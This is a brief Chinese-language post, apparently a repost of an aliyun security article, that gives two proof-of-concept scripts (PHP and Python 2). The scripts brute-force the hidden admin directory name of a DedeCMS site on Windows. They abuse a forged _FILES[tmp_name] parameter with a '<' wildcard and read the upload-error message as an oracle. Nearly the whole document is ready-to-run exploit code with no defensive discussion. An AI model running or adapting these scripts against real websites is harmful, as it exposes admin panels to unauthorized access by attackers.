仅针对windows系统
附原文地址:https://xz.aliyun.com/t/2064
poc:
<?php
$domain='http://localhost/dedecms/';
$url=$domain.'/index.php';
function post($url, $data, $cookie = '') {
$options = array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_POST => true,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_COOKIE => $cookie,
CURLOPT_POSTFIELDS => $data,
);
$ch = curl_init($url);
curl_setopt_array($ch, $options);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
$testlen=25;
$str=range('a','z');
$number=range(0,9,1);
$dic = array_merge($str, $number);
$n=true;
$nn=true;
$path='';
while($n){
foreach($dic as $v){
foreach($dic as $vv){
#echo $v.$vv .'----';
$post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$v$vv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
$result=post($url,$post_data);
if(strpos($result,'Upload filetype not allow !') === false){
$path=$v.$vv;$n=false;break 2;
}
}
}
}
while($nn){
foreach($dic as $vvv){
$post_data="dopost=save&_FILES[b4dboy][tmp_name]=./$path$vvv</images/admin_top_logo.gif&_FILES[b4dboy][name]=0&_FILES[b4dboy][size]=0&_FILES[b4dboy][type]=image/gif";
$result=post($url,$post_data);
if(strpos($result,'Upload filetype not allow !') === false){
$path.=$vvv;
echo $path . PHP_EOL;
$giturl=$domain.'/'.$path.'/images/admin_top_logo.gif';
if(@file_get_contents($giturl)){
echo $domain.'/'.$path.'/';
$nn=false;break 2;
}
}
}
}
?>
#!/usr/bin/env python
#coding:utf-8
import requests
import string
login_str = string.ascii_letters+string.digits+"_#!"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
}
def chek_poc(v,letter):
if v<=5.6:
poc= {
"dopost":"save",
"_FILES[b4dboy][tmp_name]":"./%s</img/admin_top_logo.gif"%letter,
"_FILES[b4dboy][name]":0,
"_FILES[b4dboy][size]":0,
"_FILES[b4dboy][type]":"image/gif",
}
else:
poc= {
"dopost":"save",
"_FILES[b4dboy][tmp_name]":"./%s</images/admin_top_logo.gif"%letter,
"_FILES[b4dboy][name]":0,
"_FILES[b4dboy][size]":0,
"_FILES[b4dboy][type]":"image/gif",
}
return poc
def get_login_site(version,url):
print "Testing.............."
web_site = ""
flag = 0
for l in login_str:
for i in login_str:
poc = chek_poc(version,l+i)
print l+i
req = requests.post(url,headers=headers,data=poc)
if "Upload filetype not allow !" not in req.content and req.status_code == 200:
web_site = l+i
print "[+ %s]"%web_site
flag = 1
break
if flag:
break
for num in range(1,10):
for u in login_str:
poc2 = chek_poc(version,web_site+u)
#print web_site+u
req2 = requests.post(url,headers=headers,data=poc2)
if "Upload filetype not allow !" not in req2.content and req2.status_code == 200:
web_site = web_site+u
print "[+ %s]"%web_site
break
if __name__ == '__main__':
get_login_site('5.7',"http://127.0.0.1")